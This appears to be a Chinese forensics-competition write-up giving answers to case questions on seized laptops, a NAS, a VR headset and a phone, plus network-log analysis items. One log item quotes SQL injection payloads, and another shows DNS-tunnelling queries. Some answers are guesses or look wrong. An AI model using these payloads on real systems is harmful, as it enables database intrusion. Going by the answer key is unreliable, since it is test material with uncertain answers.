  • [填空题]参考Ben_Laptop.zip,Ben 浏览上一题所述的网站时连接到他的计算机的 Wi-Fi MAC 地址是? (答案格式:”A1:B2:C3:D4:E5:F6”) (1分)
90:61:AE:C0:90:C2

找不到准确的时间 但是在这个时间段内可以看到都是连接的同一个wifi

  • [单选题]参考Ben_Laptop.zip和Ben_Jumpstation.zip,回答以下问题: Ben的计算机使用下列哪款远程桌面软件访问了Ben的跳转站(Jumpstation)? i:向日葵远程控制 ii:AnyDesk iii:TeamViewer (2分)

A. i&iii

B. ii&iii

C. 只有iii

D. 只有ii

C

同下面第73题

Ben的跳转站部分

  • [填空题]

参考Ben_Jumpstation.zip,Ben的跳转站 (Jumpstation)IP 地址和子网掩码(Subnet mask)是什么? (答案格式:192.168.1.1/28) (1分)

我是软件小子

192.168.182.128/24&#x20;

  • [填空题]

参考Ben_Jumpstation.zip,在Ben的跳转站(Jumpstation)上,该远程桌面软件中的访问ID是什么? (答案格式:请用阿拉伯数字作答) (2分)

687062512

有向日葵和teamview这些软件

但是看记录只有teamview有连接记录

  • [填空题]

参考Ben_Jumpstation.zip,Alice何时从跳转站(Jumpstation)下载了文件?(请以UTC+8回答) (答案格式:YYYY-MM-DD HH:MM:SS) (2分)

未找到

  • [单选题]

参考Ben_Jumpstation.zip,有多少个访问ID连接过跳转站 (Jumpstation)? (2分)

A. 1

B. 2

C. 5

D. 6

五个

  • [单选题]您正在检查来自 Web 应用程序防火墙的 HTTP流量日志,并注意到以下日志条目: [2023-10-15 11:45:12] “GET /search?q=%27%3B+SHUTDOWN+– HTTP/1.1” 500 [2023-10-15 11:45:15] “GET /search?q=%27+UNION+SELECT+password+FROM+users+– HTTP/1.1” 200 [2023-10-15 11:45:18] “GET /search?q=%27+OR+1%3D1+– HTTP/1.1” 200 根据这些日志条目,下列哪项陈述正确识别了攻击的类型和目标组件? i. 正在尝试 SQL 注入攻击。 ii. 攻击者瞄准的是 Web 应用程序的数据库。 iii. 正在执行跨站点脚本 (XSS)攻击。 iv. 正在瞄准 Web 服务器的操作系统。 (2分)

A. i & ii

B. ii & iii

C. i & iv

D. iii & iv

A

很明显的联合注入查询密码的sql语句 描述i、ii是正确的

  • [单选题]在对网络日志进行取证分析时,您发现内部主机向可疑網域发出了不寻常的 DNS 查询 Timestamp:2024-09-23 12:00:00 Query:dGhpc3Bj.susdomain.com Type:TXT Timestamp:2024-09-23 12:05:00 Query:cGFzc3dvcmRpcw==.susdomain.com Type:TXT Timestamp:2024-09-23 12:10:00 Query:TWVpeWEyMDI0.susdomain.com Type:TXT 结果顯示包含大量 base64 编码数据,攻击者使用了什么技术? (2分)

A. 域生成算法 (DGA)用于 C2 通信

B. 快速通量 DNS 用于隐藏恶意服务器

C. DNS 缓存投毒用于复位向流量

D. DNS 隧道用于数据泄露

D

从提供的信息中可以看出,内部主机向可疑域发出了多次DNS查询,这些查询中的数据是Base64编码的。这种行为通常与通过DNS协议传输数据的技术有关。

具体分析如下:

DNS查询中包含Base64编码的数据(如dGhpc3Bj、cGFzc3dvcmRpcw==等),这表明攻击者可能在使用DNS查询来传输信息。

这种技术通常被称为DNS隧道,用于在正常的DNS查询中嵌入、传输和隐藏数据,从而绕过传统的网络监控手段进行数据泄露或命令控制通信。

基于上述分析,攻击者使用的技术是:DNS 隧道用于数据泄露

DNS隧道是一种利用DNS协议将数据隐写在DNS查询或响应中的技术,可以用于绕过防火墙或监控系统进行隐秘通信。

  • [单选题]在检查内部客户端和外部服务器之间的捕获包,您注意到以下Transport Layer Security (TLS) 握手消息: Client Hello: Supported Versions:TLS 1.0, TLS 1.1, TLS 1.2 Cipher Suites:TLS_RSA_WITH_3DES_EDE_CBC_SHA, TLS_RSA_WITH_RC4_128_SHA Server Hello: Selected Version:TLS 1.0 Cipher Suite:TLS_RSA_WITH_RC4_128_SHA 鉴于客户端和服务器都支持更高版本的 TLS 和更强的加密套件,下列哪些是降级的合理解释? i. 中间人攻击导致协议降级。 ii. 错误配置导致回退到较弱的加密方式。 iii. 由于客户端与服务器的兼容性问题,属于正常操作。 (2分)

A. i & ii

B. 只有ii

C. 只有i

D. 以上皆是

A

在 TLS 握手中,降级到较低的 TLS 版本和较弱的加密套件通常有两种合理解释:

中间人攻击(选项 i):

中间人攻击可能迫使通信双方使用较低版本的 TLS 或较弱的加密套件,以便更容易拦截或解密传输内容。

攻击者可能通过篡改握手数据来引导客户端和服务器使用不安全的加密方式。

错误配置(选项 ii):

客户端或服务器的配置不当也可能导致降级,例如优先选择不安全的加密套件或没有启用更高版本的 TLS。

错误配置可能是由于服务器端设置不符合最佳安全实践,导致连接回退到支持的最低版本和加密套件。

选项 iii 的解释:

兼容性问题导致的正常操作在本题中不太合理。题干指出客户端和服务器都支持更高版本和更强的加密套件,因此这种情况不应属于兼容性问题导致的正常操作。

  • [单选题]參考以下HTTP访问日誌片段: 192.168.1.1 - - [12/Oct/2023:14:55:36 +0000] “GET /index.html HTTP/1.1” 200 1024 192.168.1.15 - - [12/Oct/2023:14:56:10 +0000] “POST /login.php HTTP/1.1” 200 512 192.168.1.10 - - [12/Oct/2023:14:57:01 +0000] “GET /admin/dashboarD:php HTTP/1.1” 403 256 192.168.1.20 - - [12/Oct/2023:14:58:25 +0000] “GET /index.html HTTP/1.1” 200 1024 哪个IP地址试图访问受限页面? (2分)

A. 192.168.1.15

B. 192.168.1.10

C. 192.168.1.20

D. 192.168.1.1

B

整理一下

192.168.1.1 - - [12/Oct/2023:14:55:36 +0000] "GET /index.html HTTP/1.1" 200 1024 
192.168.1.15 - - [12/Oct/2023:14:56:10 +0000] "POST /login.php HTTP/1.1" 200 512 
192.168.1.10 - - [12/Oct/2023:14:57:01 +0000] "GET /admin/dashboarD:php HTTP/1.1" 403 256 
192.168.1.20 - - [12/Oct/2023:14:58:25 +0000] "GET /index.html HTTP/1.1" 200 1024

这四条日志记录中 第三条在ip192.168.1.10访问/admin/dashboarD:php时返回了 403 错误代码,表示该页面是受限的

  • [单选题]參考以下网络数据包捕获的十六进制部分: 0000 00 1a a0 b0 c0 d0 00 1b c1 d1 e1 f1 08 00 45 00 0010 00 3c 1c 46 40 00 40 06 a6 ec c0 a8 01 0a c0 a8 0020 01 14 00 50 d1 5c 1a 2b 3c 4d 5e 6f 70 80 90 a0 0030 b0 c0 d0 e0 f0 00 00 00 00 50 02 20 00 b5 e2 00 数据包的源IP地址是什么? (2分)

A. 192.168.1.10

B. 192.168.1.20

C. 10.0.0.1

D. 172.16.0.1

A

恢复一下 应该是

0000 00 1a a0 b0 c0 d0 00 1b c1 d1 e1 f1 08 00 45 00
0010 00 3c 1c 46 40 00 40 06 a6 ec c0 a8 01 0a c0 a8
0020 01 14 00 50 d1 5c 1a 2b 3c 4d 5e 6f 70 80 90 a0
0030 b0 c0 d0 e0 f0 00 00 00 00 50 02 20 00 b5 e2 00

源IP地址位于第26到29字节(c0 a8 01 0a) 所以应该是192.168.1.10

  • [单选题]题目见描述(81) (2分)參考以下Wireshark捕获摘要:
    No. Time Source Destination Protocol Length Info
    1 0.000000 192.168.1.10 192.168.1.255 ARP 42 Who has 192.168.1.255? Tell 192.168.1.10
    2 0.005000 192.168.1.20 192.168.1.10 ICMP 98 Echo (ping) request
    3 0.010000 192.168.1.10 192.168.1.20 ICMP 98 Echo (ping) reply
    4 0.020000 192.168.1.30 192.168.1.10 TCP 66 12345 > 80 [SYN] Seq=0 Win=64240 MSS=1460
    5 0.025000 192.168.1.10 192.168.1.30 TCP 66 80 > 12345 [SYN, ACK] Seq=0 Ack=1 Win=64240 MSS=1460
    6 0.030000 192.168.1.30 192.168.1.10 TCP 54 12345 > 80 [ACK] Seq=1 Ack=1 Win=64240
    描述此捕获中发生的事件顺序。

A.&#x20;

Ping请求后发送ARP请求

B.&#x20;

ARP请求、Ping交换和TCP握手

C.&#x20;

TCP握手后发送ARP请求

D.&#x20;

仅存在ICMP流量

B

第1个数据包:源 192.168.1.10 向广播地址 192.168.1.255 发送 ARP 请求,扫描IP 地址 192.168.1.255

第2和第3个数据包:源 192.168.1.20 发送 ICMP Echo 请求(Ping),目的地址为 192.168.1.10,并得到 ICMP Echo 回复。

第4、5和6个数据包:源 192.168.1.30 向 192.168.1.10 发起 TCP 三次握手(SYN、SYN-ACK、ACK),尝试建立连接。

  • [单选题]题目见描述(82) (2分)參考服务器上netstat命令的以下输出:
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address Foreign Address State
    tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
    tcp 0 0 192.168.1.10:22 203.0.113.20:54321 ESTABLISHED
    tcp 0 0 192.168.1.10:80 198.51.100.5:12345 ESTABLISHED
    tcp 0 0 192.168.1.10:443 203.0.113.25:23456 ESTABLISHED
    哪些服务当前正在服务器上运行并监听?

A.&#x20;

在80端口上的SSH和54321端口上的HTTP

B.&#x20;

仅在22端口上的SSH

C.&#x20;

在22端口上的SSH,12345端口上的HTTP,以及443端口上的HTTPS

D.&#x20;

仅在23456端口上的HTTPS

C

根据提供的信息:

0.0.0.0:22 LISTEN 表示服务器正在监听 22端口,这是常见的 SSH 服务。

192.168.1.10:80 ESTABLISHED 表示在 80端口 上有一个与远程地址 198.51.100.5:12345 的 HTTP 连接。

192.168.1.10:443 ESTABLISHED 表示在 443端口 上有一个与远程地址 203.0.113.25:23456 的 HTTPS 连接。

因此,服务器上有 SSH 服务在 22端口 上监听,HTTP 服务在 80端口 上活跃,以及 HTTPS 服务在 443端口 上活跃。

  • [单选题]参考以下电子邮件头信息: From:”John Doe” <john.doe@example.com> To:”Jane Smith” <jane.smith@company.com> Date:Thu, 12 Oct 2023 19:00:00 +0000 Subject:Important Update Received:from unknown (HELO mail.example.com) (192.0.2.10) by mail.company.com with SMTP; Thu, 12 Oct 2023 19:00:05 +0000 X-Mailer:PHPMailer 5.2 识别可能表明电子邮件被伪造的任何异常。 (2分)

A.&#x20;

使用了PHPMailer 5.2

B.&#x20;

电子邮件头部显示未知发件人

C.&#x20;

电子邮件在19:00:00发送,但在19:00:05接收

D.&#x20;

主题是”重要更新”

B

猜测Received:from unknown 显示未知发件人可能表明电子邮件被伪造

  • [单选题]在网络取证中,您会检查TCP/IP数据包中的哪个字段来验证数据在传输过程中是否受到了破坏? (1分)

A.&#x20;

TCP序列号

B.&#x20;

数据包大小

C.&#x20;

校验和(Checksum)

D.&#x20;

目标端口

C
  • [单选题]以下哪个特征最能表明僵尸网络中的指挥与控制(C2)通信? (1分)

A.&#x20;

高频率的DNS查询到热门域名

B.&#x20;

数据包传至255.255.255.255

C.&#x20;

与远程服务器进行定期周期性通信

D.&#x20;

使用FTP协议进行过多的文件传输请求

C

僵尸网络的指挥与控制(C2)通信通常表现为 定期的周期性通信,即受感染的设备(僵尸主机)与远程C2服务器之间进行定时连接,以接收指令或发送数据。该周期性的通信是僵尸网络运作的核心,通常在没有明显的异常情况下进行。

  • [单选题]在IP封包分析中,哪一個數值最能夠協助推斷封包經過的距離? (1分)

A.&#x20;

由于路由无响应导致的数据包丢失增加

B.&#x20;

IP封包中的TTL值

C.&#x20;

ICMP回显回复中不匹配的序列号

D.&#x20;

路由器级别检查IP选项字段的异常

B

TTL(Time To Live,生存时间)字段是IP封包中的一个重要字段,表示数据包在网络中可以经过的最大跳数(即路由器的数量)。每当数据包经过一个路由器时,TTL值会减1。如果TTL值为0,数据包会被丢弃并发送ICMP“超时”消息回源主机。因此,TTL值是推测数据包经过的距离(即跳数)的直接依据。

  • [单选题]通过从跳转站获得的信息(Ben_Jumpstation.zip),你认为Alice的笔记本电脑可能包含与犯罪相关的更多信息。你建议调查员进一步扣押Alice的笔记本电脑进行分析。 参考Alice_Macbook.e01,计算机名称是? (1分)

A.&#x20;

Alice’s MacBook Pro

B.&#x20;

Alice’s Laptop

C.&#x20;

Alice’s Mac

D.&#x20;

Alice’s MacBook

A

  • [填空题]参考Alice_Macbook.e01,Alice的计算机运行的macOS Monterey版本是? (答案格式:123.456.789) (1分)
12.7.4

  • [填空题]参考Alice_Macbook.e01,Alice的计算机的EN0 MAC地址是? (答案格式: xx:xx:xx:xx:xx:xx, 小写英文字母和阿拉伯数字混合组成) (1分)
F4:5C:89:A1:C0:07

  • [填空题]参考Alice_Macbook.e01,Alice在2024年8月19日收到了一个包含15个人个人资料的Excel文件,她是从哪一个平台下载这个文件的? (答案格式: 请用小写英文作答 (无须留空白位),例如:facebook) (2分)
whatsapp

这个其实直接看Alice的Mobile手机是最好的 是John在whatsapp上发到三五成群这个群聊里面的 时间就是8月19日

  • [填空题]承上题,参考Alice_Macbook.e01,Alice是何时在她的Mac上安装了上述应用程序? (答案格式:YYYY-MM-DD HH:MM) (2分)
2024-08-19 09:57:00

找到WhatsApp安装程序的下载记录 我更倾向于访问时间是安装时间

  • [填空题]参考Alice_Macbook.e01,Alice在2024年8月19日在计算机上截取了两张屏幕截图,都是关于安置客服人员的电骗中心位置,她是使用哪个浏览器来搜索这个位置? (1分)
safari

先找到这两张截图

在safari浏览器中找到最近关闭过谷歌地图的记录

  • [填空题]参考Alice_Macbook.e01,她的计算机的Team Viewer ClientID是多少? (答案格式:只需使用阿拉伯数字回答) (1分)
358639376

  • [单选题]参考Alice_Macbook.e01,Alice曾经登录Teamviewer并获取一个包含个人数据的excel文件,Alice是透过以下哪一个方法登录Teamviewer以获取该文件? (2分)

A.&#x20;

Teamviewer Desktop Application

B.&#x20;

web.teamviewer.com

C.&#x20;

Anydesk

D.&#x20;

以上皆不是

A
  • [单选题]承上题,上述包含个人数据文件的文件名是? (2分)

A. newfile.xlsx

B. personal_data.xlsx

C. Personal_details_2.xlsx

D. Kingsoft_Et_Stocka.xlsx

C

  • [填空题]承上题,参考Alice_Macbook.e01,Alice是何时通过Teamviewer 获取上述包含个人资料的文件的? (答案格式:YYYY-MM-DD HH:MM) (2分)
2024-08-23 17:31:53

  • [填空题]参考Alice_Macbook.e01,Alice透过Teamviewer连接另一台计算机以获取文件的Teamviewer ID是多少? (答案格式:只需使用阿拉伯数字回答) (2分)

John的笔记本部分

  • [填空题]同样,跳转站(Ben_Jumpstation.zip)也指向一些可能从John的桌面计算机获取的关键信息。 参考John_Desktop.e01, 系统最后关机时间是? (答案格式:YYYY-MM-DD HH:MM:SS) (2分)
2024-08-20 17:40:05

  • [单选题]参考John_Desktop.E01, 系统连接USB SanDisk 3.2Gen 1, 其序列号是? (2分)

A. 01010de54f417fee2292cb6b6ed760608009cace6e76a

B. D9644B9861A106C9DB4FD4599863C856C6789384B

C. 4f7b6f8fc20f74329994f7d3fac6920a8d0ecd33fabad423

D. 8fe24bf440f2def1c5182e1a27a4c183f5d6024b758c803

A

这里可以在USB使用记录中找到序列号 但是只能得到前20位 可以判断出是A选项

  • [判断题]参考John_Desktop.e01, 于2024年8月28日13时57分21, John曾连接过Meta Quest 3吗? (2分)

&#x20;正确

&#x20;错误

正确

找到这个usb设备信息

发现最后接入时间: 2024-08-28 13:57:06 最后弹出时间: 2024-08-28 14:15:12 那么可以判断在2024年8月28日13时57分21 John可能连接过Meta Quest 3这个USB设备

  • [填空题]参考John_Desktop.E01, John在何时打开了Joshe investment.JPG文件? (答案格式:YYYY-MM-DD HH:MM:SS) (2分)
2024-08-01 16:13:08

  • [填空题]参考John_Desktop.e01, 用户 “DESKTOP-HDKJIJJ” 的安全标识符(SID)是? (答案格式:大写英文字母,阿拉伯数字和符号’-‘ 混合组成) (2分)
S-1-5-21-938709476-2694722248-4044499888-1001

  • [单选题]参考John_Desktop.e01, 有多少个用户帐户是停用(disabled)? (2分)

A. 1

B. 2

C. 3

D. 5

虽然有四个停用,但是只有一个是有密码且登录过的,其他的都是系统账户

A

  • [填空题]参考John_Desktop.E01, 该计算机被动态主机配置协议(DHCP) 所分配的IP位址是? (答案格式:123.123.123.123) (2分)
172.20.10.2

  • [单选题]参考John_Desktop.E01, DF_2024_08_29_10_01_27_906.mp4 是什么类型的视频? (2分)

A. 自我介绍

B. 产品锁售

C. 深伪视频

D. 足球比赛

C

找到这个视频 一眼ai换脸 是深伪视频

VR眼镜部分

CtrlF大法好

安卓系统的VR眼镜

  • [单选题]在搜查John住所期间,调查员检取了一副虛疑實景 (VR) 眼鏡进行了取证检查。 参考Quest_3_2G0YC5ZFB307D7.zip 文件,虛疑實景 (VR) 眼鏡有多少个使用者? (3分)

A. 1

B. 2

C. 3

D. 4

A

  • [单选题]参考Quest_3_2G0YC5ZFB307D7.zip,VR 眼鏡默认安装了什么即时通讯软件 (Instant Messaging App)? (3分)

A. WeChat

B. LINE

C. WhatsApp

D. Telegram

C

  • [填空题]参考Quest_3_2G0YC5ZFB307D7.zip, 虛疑實景 (VR) 眼鏡应用程序”Gun Raiders”的版本是? (答案格式:1.2.3) (2分)

10.6.5

  • [判断题]参考Quest_3_2G0YC5ZFB307D7.zip,VR 眼镜应用程序”Gun Raiders”,可以启动设备发现或操纵蓝牙 (2分)

&#x20;正确

&#x20;错误

正确

类比apk中的AndroidManifest.xml里的权限写法

  • [填空题]参考Quest_3_2G0YC5ZFB307D7.zip,在DCIM 文件夹内,VR 眼镜有多少视频的文件修改时间是2024年8月13日? (答案格式:请以阿拉伯数字作答) (2分)

3

\Quest_3_2G0YC5ZFB307D7\android_shared\sdcard\DCIM\v目录下去找,修改日期排序

  • [填空题]

参考Quest_3_2G0YC5ZFB307D7.zip,在提供的网络信息中,虛疑實景 (VR) 眼鏡’wlan0’ 网络接口的 IPv4 地址是? (答案格式:123.123.123.123) (2分)

192.168.1.142

NAS部分

除了以上John的所有设备之外,调查员还发现了一台NAS存储设备,并转交你进行分析。 参考 John_NAS_1.E01 和 John_NAS_2.E01,它是哪一种独立磁盘冗余阵列 (RAID)? (2分)

A. RAID 0

B. RAID 1

C. RAID 5

D. 以上皆不是

A

首先在比赛之前,看案情说明,可以发现题目给了两个nas盘,所以初步判断是raid0加密

注:UFS永远的神,把两个NAS拖进去,就出来答案了

  • [判断题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的容量有512GB (2分)

&#x20;正确

&#x20;错误

错误

怎么算都没有512G

  • [单选题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的可用空间有多少? (3分)

A. 512GB

B. 426GB

C. 417GB

D. 9.4GB

这样选择导出分析很快

426G

  • [判断题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS 的文件系统格式是EXT3 (2分)

&#x20;正确

&#x20;错误

同上EXT4

错误

  • [单选题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS 的用户人数有多少个? (2分)

A. 1

B. 2

C. 3

D. 4

检查shadow文件,如果把guset算上是三个用户

但我这里认为是两个

一个admin一个johnkiller

  • [单选题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该 NAS 内有多少张圖片标示 ‘This is a Child PORN PHOTO’ ? (2分)

A. 1

B. 2

C. 3

D. 4

有一个是删除文件后面会提到,所以这里应该是四个

D

  • [填空题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,视频 ING_VID_8081695_10s.mp4 在什么时候放进 NAS 内? (答案格式:YYYY-MM-DD HH:MM:SS) (3分)

2024-08-08 10:59:40

直接看创建时间

  • [填空题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,dcdb711a52a94fe9b6eb742a6919410D.mp4是在哪个网站下载的? (答案格式:www.abcd.com) (3分)

原始数据搜索可以找到这个下载地址

但是不确定是上面的地址还是下面的这个

比赛的时候我们选择了www.vishi.com

  • [填空题]

参考John_Desktop.E01,John 访问NAS的网络地址是? (答案格式:123.123.123.123) (2分)

去John里看浏览器记录,发现了这个

169.254.43.127

  • [单选题]

参考John_Desktop.E01, 该 NAS 的网络驱动器盘符(Network Drive Letter)是? (2分)

A. A

B. C

C. Z

D. F

John的电脑直接访问Z盘访问了NAS里面的文件

因此确定是Z盘为网络驱动器盘符

  • [判断题]

参考John_Desktop.E01, John_NAS_1.E01 和 John_NAS_2.E01, 当中的v文件夹内的视频及照片数量是相同的? (2分)

&#x20;正确

&#x20;错误

比对一下发现数量是一样的

正确

  • [填空题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的a文件夹中, “1.jpeg” 是由哪个网站生成? (答案格式: abcd.com) (2分)

1.jpeg一看就是ai生成的照片

查看edge访问记录,发现这个人先是搜了一堆明星图片,还搜了ai制作图片的消息

但我没有找到在线生成的记录

最后发现John从GitHub上找了个开源项目,显然是个ai换脸项目

于是我的答案是

GitHub.com

有点滑稽,欢迎大佬点评

  • [填空题]

参考 John_NAS_1.E01 和 John_NAS_2.E01,该NAS的c文件夹中, 有一个被删除了的照片, 它的名称是什么? (答案格式:小写英文字母,阿拉伯数字和符号’-‘ 混合组成, 例如: 123-abcf-456.jpg) (2分)

这个照片就是上文的被删除的图片

203533-17158629334c7d.jpg

  • [填空题]

根据你以上的发现,你直觉认为有无辜的人被雇为所谓的客服人员,他们的安全仍然存在疑虑。你决定再次查看Alice的手机镜像以确认你的推测。 参考Alice_Mobile.bin,于2024年8月16日,Alice使用外送程序 “Foodpanda” 于哪间店铺点餐? (答案格式:大写英文字母,例如: GOODCAFE(CENTRAL)) (3分)

  • [单选题]参考Alice_Mobile.bin,于2024年8月30日,Alice使用外送程序 “Foodpanda” 点餐用了哪种方式付款? (2分)

A. 微信支付

B. PayMe

C. 支付宝

D. 现金

E. 信用卡

C

猜了个比较常见的支付宝

  • [填空题]Alice_Mobile.bin,Alice最后使用外卖程序 “Foodpanda” 的日期? (答案格式:YYYY-MM-DD) (2分)

  • [单选题]参考Alice_Mobile.bin,Alice要求安排”客务人员”逃到哪里? (2分)

A. 埃及

B. 阿根廷

C. 巴西

D. 哥伦比亚

E. 南非

E

这部分题目蛮幸运的,团体赛开赛前下发容器密码后,即便题目未知,在火眼分析的过程中浏览了部分聊天记录,关注到了这部分内容

  • [单选题]参考Alice_Mobile.bin,Alice曾经向“客服人员”发送一张照片, 指出上船地点的位置, 拍摄这张照片的GPS经纬值是什么? (2分)

A. 22.474444444444, 114.039722222222

B. 22.473611111111, 114.042777777778

C. 22.475277777778, 114.038888888889

D. 22.475000000007, 114.035833333333

E. 22.476388888889, 114.036388888889

A

在客服群里找到,跳转到源文件后导出

脚本转换

  • [单选题]参考Alice_Mobile.bin,根据多媒体文件的分析,于2024年8月16日,Alice曾到哪里进行拍摄? 凭着你及团队的机智及专业知识,成功锁定犯罪团伙禁锢人质的位置。行动单位根据你的讯息,迅速展开拯救行动,赶在被押离港前成功救出人质。 (2分)

A. 旺角

B. 沙田

C. 黄大仙

D. 大生围

E. 天水围

D

到图片里面按时间排序

赛后根据经纬定位验证